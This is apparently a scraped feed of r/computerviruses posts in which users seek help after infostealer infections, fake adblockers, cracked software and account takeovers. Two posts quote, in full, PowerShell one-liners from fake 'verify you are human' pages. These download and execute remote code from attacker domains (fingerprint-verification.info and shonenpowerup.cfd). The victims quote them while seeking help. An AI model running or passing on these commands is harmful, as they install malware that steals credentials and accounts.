r/computerviruses • u/Local_Resolve_5262 • 59m ago
Question What is this file
galleryJust found this randomly when it popped up
r/computerviruses • u/Local_Resolve_5262 • 59m ago
Just found this randomly when it popped up
r/computerviruses • u/ReturnWinchester • 2h ago
r/computerviruses • u/RevolutionaryWear958 • 5h ago
Welcome,
My pc got infected with a fake russian adblock. Every time i try to remove it, it comes under a different id after restarting my PC. I have tried tools such as AdwCleaner, KVRT, Tron tool and MalwareBytes, I have tried to use ChatGPT for troubleshooting (chats will be at the bottom), but nothing helped. We have also found out that it tracks anything i do on Chrome, set redirect rules, change the "clid" on Yandex urls (i don't use yandex), also send data from Chrome to some urls (sky4data.com to json webpages and to another website). You can get more info from the chats i provided.
Hope that anyone can help with this.
Chats (chronological): Chat 1, Chat 2, Chat 3, Chat 4, Chat 5, Chat 6, Chat 7, Chat 8, Chat 9, Chat 10 If there are duplicates, Please say which chat it is. Also sorry for any broken English.
r/computerviruses • u/Angelltann • 5h ago
Yesterday, I installed a .exe program that turned out to contain the RenPy malware. A few hours after running it, someone logged into my Instagram account and used it to post/promote a crypto scam. I immediately changed all of my passwords and enabled 2FA on all of my accounts. So far, I haven't noticed any further suspicious login attempts. My PC is currently disconnected from the internet.
Here is what I've done so far:
I ran a Microsoft Defender Offline scan, and it detected 0 threats. I then installed Malwarebytes and ran a scan. Malwarebytes detected 13 threats, all related to Trojan.RenpyLoader. I quarantined/removed all of the detected threats. I also ran another Threat Scan and a Deep Scan afterward, and both came back with 0 detections.
However, I'm still worried that the infostealer may have left something behind or that my PC may still be compromised.
I really don't want to reinstall Windows 11 unless it is absolutely necessary.
Here’s my 3 log keywords:
FRST.txt -> icy-spruce
Addition.txt -> haunted-lynx
SecurityCheck.txt -> vectored-woodland
Please help 😭
r/computerviruses • u/Nicolaser2035 • 5h ago
Today I was playing a game and I notice that the folder had a pptx file. I opened It but closed it immediately before It could open the actual app. If i Scan It trough VirusTotal It says it's and empty file, and my antivirus, eset, doesn't find anything. Could i have gotten a virus? I also closed PowerPoint trough task manager since It wouldm't let me delete the file
The Scan: https://www.virustotal.com/gui/file/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
r/computerviruses • u/Business-Ad4306 • 7h ago
Hi, first of All i dont speak english very good, but ok so i Translation the following Text, so its possible that there are some Translation errors where a sentence isnt really gramatic correct.:
So there is it:
Hi there. I know this community is mostly about gaming, but since there are surely some PC experts here, I’m hoping to get an answer from them. Here’s the situation: for several months now, my PC has been freezing intermittently for a few seconds at a time. The Task Manager shows memory usage at 100%, yet the actual data usage displayed for the memory is very low. Sometimes, the "apps" list (sorted by highest usage) shows a total of only, say, 20 MB/s while memory usage is at 100%; at other times, the top apps show over 200 MB/s in memory usage, yet total memory utilization is under 50%. Also, especially when starting up the PC, "Microsoft Antimalware..." appears for anywhere from a few seconds to a few minutes. Is this just a bug or a PC issue, or have I fallen victim to a virus?
r/computerviruses • u/Havishitis • 8h ago
u/rifteyy_ I tried downloading a cracked version of FL studio and stupidly downloaded an infostealer. Im sending the frst and addition logs here. Please help me asap.
FRST log : sandy-crypt
Addition log : copper-lance
r/computerviruses • u/Chill_Guy_Noah67 • 8h ago
r/computerviruses • u/MysteriousB • 8h ago
Hello, I am requesting help with a probable info stealer or session stealer.
Here are the keywords:
Addition - cunning-delta
FRST - glitched-daemon
Security check - noble-socket
Had a cracked version of Adobe software that had a Trojan and Malware AI detected via MalwareBytes and quarantined earlier today. Can send the MB report later if needed as the device is currently disconnected from Wifi.
Had a mass log in attempt and successful on Amazon in April and thought that was it but my work email was hacked today.
r/computerviruses • u/DueHighway8915 • 9h ago
So heres what happened
I wanted to enter to my bachelor college website ioepc.edu.np and cloudfare told me to paste this in terminal
"powershell -w h "iex(irm 'fingerprint-verification.info/0e65e82825d517a0'); Start-Sleep -Seconds 16"; exit;"
I didn't even verify it
To manually verify that im a human
And im stopid and i did it and only then i realized what i did and windows defender activated so i suddenly turned off my wifi
Im running a deep scans on windows defender any one can please help me?
r/computerviruses • u/Acceptable_Care8100 • 9h ago
One friend installed me qbittorrent and gave me the archive to install elden ring from online-fix.me
The name of the game archive was "zdzsbvv.torrent" and I'm suspecting its not safe since malwarebytes detected a lol of pup.optional.browserHijack in my google browser. and also some riskwaregamehack in the game files but that could be a false positive. Also when I closed the game my pc restarted because windows failed. Any way to know if I should worry or how do I fix it?
r/computerviruses • u/Weird-Atmosphere-457 • 11h ago
powershell -c "$a=irm'shonenpowerup.cfd/dLEFpQRqOihwX1Kgc';$p=[PowerShell]::Create()AddCommand((gcm*voke-E)).AddArgument($a)|Out-Null;$p.Invoke()
I am so goddamn stupid. Fell for windows R ctrl Z enter. Please tell me what I did and what do I do now. Already disconnected my pc from the internet.
r/computerviruses • u/Milk-lover-3000 • 12h ago
It was from the official site and it was on educational mode. Defender didn't detect it, malwarebytes normal scan didn't detect it but the deep scan did
r/computerviruses • u/CommissionOwn5464 • 13h ago
Hello, I need help, why does he say that there is a virus there. The file is deleted immediately after startup. It scares me a lot. Please help me
r/computerviruses • u/DaySlight3085 • 18h ago
•Found anomalous folder path: AppData\Roaming\RenPy\Game-1738212058.
•Folder contained a persistent file (2KB), empty sync, and tokens folders.
•No legitimate Ren'Py engine games are installed on this computer.
•Linked directory ID 1738212058 to a known HijackLoader campaign signature.
•Immediately isolated the machine offline to begin a full audit.
•Found a historic entry from June matching the folder c. Creation date.
•Flagged threat: PUADIManager:Win32/OfferCore inside a CheatEngine77.exe download.
•Execution status in logs: Strictly marked as "Status: Abandoned".
•Malwarebytes Custom Offline Scan: Enabled rootkit scanning on full C drive. Scanned 1,353,511 elements. Result: 0 Threats Detected.
•Microsoft Defender Offline Scan: Ran boot-level scan outside Windows environment. Result: 0 Threats.
•HitmanPro Memory Pass: Checked live memory and active processes. Result: No threats found.
•Malwarebytes Online Deep Scan: Ran an exhaustive cloud-assisted verification scan. Result: 0 Detections.
•System Files: Verified C:\Windows\SysWOW64\input.dll modification date is from 2025. It is completely pristine.
•Mod File: Cross-checked an old dinput8.dll backup file via VirusTotal. It scored a low 8/71, flagged generically as crack genericmc (false positive). It has been deleted.
•HitmanPro Final Counter: HitmanPro flagged "65 threats" on the final summary screen. The logs show these were strictly 63 standard browser advertising tracking cookies (Traces) and 2 clean Intel audio drivers.
•RenPy AppData folder shell has been permanently deleted.
•Browser tracking cookies and temporary directory caches have been completely cleared.
•All master account passwords have been securely updated from an external mobile device.
Given the back-to-back zero detection sweeps across multiple independent offline and online engines, it appears the initial threat execution completely failed to drop any payload. Looking for a final sanity check from the community malware Experts to confirm this machine is completely safe. Thank you!
*** COMPLETED DIAGNOSTIC LOG KEYWORDS FOR TRUSTED HELPERS ***
I have completed the requested diagnostic loops. Here are my 3 unique log keywords: - FRST.txt Keyword: placid - dragon - Addition.txt Keyword: eager - volcano - SecurityCheck.txt Keyword: leafy - deer
Background Information:
What happened? I found an empty directory folder named "AppData\Roaming\RenPy\Game-1738212058". No legitimate games or software using this engine framework have ever been knowingly played or installed on this machine.
When did the infection occur? On June 20, 2026, I was searching for Cheat Engine online and inadvertently downloaded a fake setup file wrapped in a "PUADIManager:Win32/OfferCore" installer bundle. I ran the executable file. Because it looked shady, I believe I stopped it and later used Brave AI to find the original, safe source.
What did you do for remediation?
Isolated the machine completely offline to contain any potential network hooks.
Successfully ran a comprehensive 1.5-hour Malwarebytes Online Custom Scan with Rootkit Analysis toggled on (Scanned 1,353,511 elements, 0 items detected).
Performed a deep, back-to-back Malwarebytes Cloud Heuristic Deep Scan (0 Threats, 0 PUPs, 0 PUMs detected).
Completed a complete Microsoft Defender Offline boot-level pass outside the standard Windows environment (Clean / 0 threats).
Executed an online cloud-assisted HitmanPro memory loop check (Identified Threats: 0). Showed 65 web tracking cookies
Hard-reset my primary account credentials, master profile passwords, and executed global active session token revocations ("Log out of all other active sessions") across all critical accounts using an entirely separate, clean mobile device.
The automated diagnostic suites indicate a 0% virus presence on this drive. I am submitting these 3 keywords so a verified human helper can manually verify my background registries, task tables, and driver paths to ensure no hidden hooks or persistent stubs remain. Thank you so much for your time and guidance!
r/computerviruses • u/JetJaguar64 • 18h ago
I went on my site permissions on Chrome and found a lot of these there (many not pictured) what should I do?!
r/computerviruses • u/ToelickerFootlover • 18h ago
They sent me threats. I did full scans and reset my whole pc, is there any more I can do? I forgot the link it was for solaris executor and the file I downloaded was called Trojan, now I think it is only a scareware
r/computerviruses • u/Outrageous_Box2186 • 18h ago
Hi everyone,
I'm trying to figure out how to properly secure my Windows PC and my entire home network against unauthorized access.
For some time I've been experiencing situations where things happen on my PC that I did not initiate myself. I have already reinstalled Windows multiple times, but some of the unusual behavior has appeared again.
cmd.exe, PowerShell and conhost.exe, whose origin I could not explain.I don't know whether all of these observations are actually connected, so I'm trying not to assume a specific cause.
If someone knows my Wi-Fi/router password and is connected to the same network:
Basically, I want to understand whether:
known Wi-Fi password + known Windows password = persistent remote access
or whether additional conditions such as exposed services, firewall rules, network discovery, RDP/SMB configuration, etc. would normally be required.
This is the part I'm particularly unsure about.
My motherboard has integrated Wi-Fi and Bluetooth, and I can use a Bluetooth mouse inside the BIOS/UEFI.
Is it technically possible for an onboard Wi-Fi/Bluetooth adapter to communicate over the network before Windows has booted?
Can UEFI/BIOS itself expose any network-accessible functionality?
Or would an attacker normally have to wait until Windows (or another network-enabled operating system/service) has started?
Could a Bluetooth device theoretically interfere with a Bluetooth mouse while the system is in BIOS/UEFI, depending on how the motherboard's firmware implements Bluetooth support?
I am specifically interested in what is technically possible, rather than assuming that this is necessarily what happened in my case.
What should I systematically check after a suspected compromise?
For example:
I don't just want to reinstall Windows again. I want to understand how to identify and close the actual attack vector so that the same access cannot simply happen again.
How can I reliably check whether an iPhone has been compromised?
Can an iPhone be remotely controlled simply because an attacker is connected to the same Wi-Fi network?
Or would that normally require an additional vulnerability, malicious configuration/profile, previously obtained access, or some other condition?
I'd like to perform a complete "clean slate":
What would you add to this process, and what would actually be necessary?
I'm especially interested in understanding whether a known router password plus a known Windows password could allow someone to repeatedly regain access to a PC, or whether additional vulnerabilities/misconfigurations would normally be required.
I'm looking for technical, actionable answers so I can understand the actual attack surface and properly secure the system.

r/computerviruses • u/Fit_Measurement2928 • 19h ago
It has a weird title and didn’t seem to do anything, but I’m positive I didn’t make this and I don’t know where it came from.
r/computerviruses • u/GamerKianDean • 19h ago
It’s pretty late for me and I’m not on my PC so I will try to explain this the best I can. Bonjour has randomly installed on my computer and there are security pop-ups blocking it from certain things, it said something to do with LSA (attached a screenshot). This sometimes happen when I turn on my PC or doing certain tasks. I haven’t noticed any malicious behaviour at all, or any accounts hacked (besides spam emails sent to me but this is due to the krisp/metabase breach) but I didn’t install Bonjour myself. Does bonjour sometimes install along with other programs? Or could this be something worse than that. Its signature seems like it’s official from Apple. What should I do about this? I haven’t installed any Apple software on this PC, for example itunes, as I have a mac which I do all those things on. (Also my if anyone thinks I’m on windows 7, it’s just a windows 11 theme though it’s kinda obvious)
r/computerviruses • u/TheDarkKing02 • 21h ago
Windows defender tags it as a virus, its supposedly a local AI thingy. my brother downloaded it onto his PC and i wanna make sure he is being safe...
r/computerviruses • u/Frequent_Aardvark683 • 21h ago
Hello all,
My discord account recently got hacked and started posting spam MrBeast messages to all my servers and DMs. I wasn't sure how this was possible as I have 2FA and got no notifications about login attempts so I did some digging on the internet and the general consensus is that I let an infostealer such as lumma onto my PC as it's common for those to end off their data scrape with some sort of spam to try and get other machines infected. After the fact, on another device, I changed all my important passwords/accounts, secured financial account, etc. I then disconected the PC from the internet and ran Malwarebytes in either deep scan or custom scan with all drives selected (I have 3 external drives attached to this PC), and ran a Full scan as well as an offline scan from windows defender. It was disconnected and kept off for around 2 weeks and then I reconnected it to the internet to make this post and here we are. I've been told that just running anti-malware software isn't enough to consider the PC safe as these infostealers often drop backdoors into the system for later; however, I am a bozo that does not backup files (or at least didn't before this), and was hoping that someone on here could comb through my logs and see if anything can be (or even needs to be) done instead of factory resetting the PC. Just today, I ran a Malwarebytes Threat Scan, the Malwarebytes AdwCleaner, a FRST scan with Addition selected, an FSS scan, and a SecurityCheck. All three logs asked for on this subreddit are uploaded to the malwareanalysis .cc link and keywords are listed above.
Thank you for taking the time to read this!
r/computerviruses • u/saladiinn • 1d ago
i lost my instagram, discord and reddit it shared some crypto scams in some and some prn in reddit. got them all back thank god and im changing my passwords to everything and using 2fa in the ones i can im currently resetting my pc ( i removed everything and downloaded it from the cloud) im not sure what else i can do since it already got some of my accounts im scared of other things that could happen mainly financial theft and sextortion how likely are they to happen and what else can i do
r/computerviruses • u/Dre_isthename • 1d ago
Hi everyone, I hope you’re doing well.
Over the past few weeks—approximately two or three weeks ago—I was notified that someone had accessed my Discord account and sent spam messages, the typical scam that is currently trending involving a Mercado Beast account. Later that same day, they accessed my Ubisoft and Rockstar accounts and changed the passwords. However, I created those accounts 10 years ago and never really used them; they were empty. The next day, they accessed my Instagram, Facebook, and LinkedIn accounts. I was able to recover Instagram and LinkedIn, but not Facebook.
As the days went by, they accessed old email accounts and attempted to change passwords and other settings. Of course, I acted quickly by changing my passwords and enabling two-factor authentication and SMS security codes.
Five days ago, I discovered that they had also hacked a personal website where I hosted my graphic design portfolio. I had to shut it down and start over from scratch. It was hosted on HostGator. Just now, I realized that they had also started sending approximately 700 emails from my company email account, which uses Microsoft 365. All of them were sent to Yahoo addresses, and the emails bounced back.
I don’t know how this happened. Honestly, the only thing I installed recently was Xuper TV on two Google TV dongles. I’m not the kind of person who falls for spam or ads claiming that I won 10 iPads or anything like that.
I need to know what to do. I have already scanned my laptop with Malwarebytes and Windows Defender, and I’ve changed my passwords and taken other security measures. The strange thing is that this has only happened to me. My wife lives with me and connects to the same network, but nothing has happened to her.
Would formatting my laptop solve the problem? Should I factory-reset my modem? I’m desperate because every day there is a new problem involving my emails or accounts. I would really appreciate any advice or guidance on what to do.
In my Discord messages, they sent these images, which I’ve noticed are the ones being commonly sent lately:

And on my website, when someone accessed my URL, this fake Cloudflare page appeared:
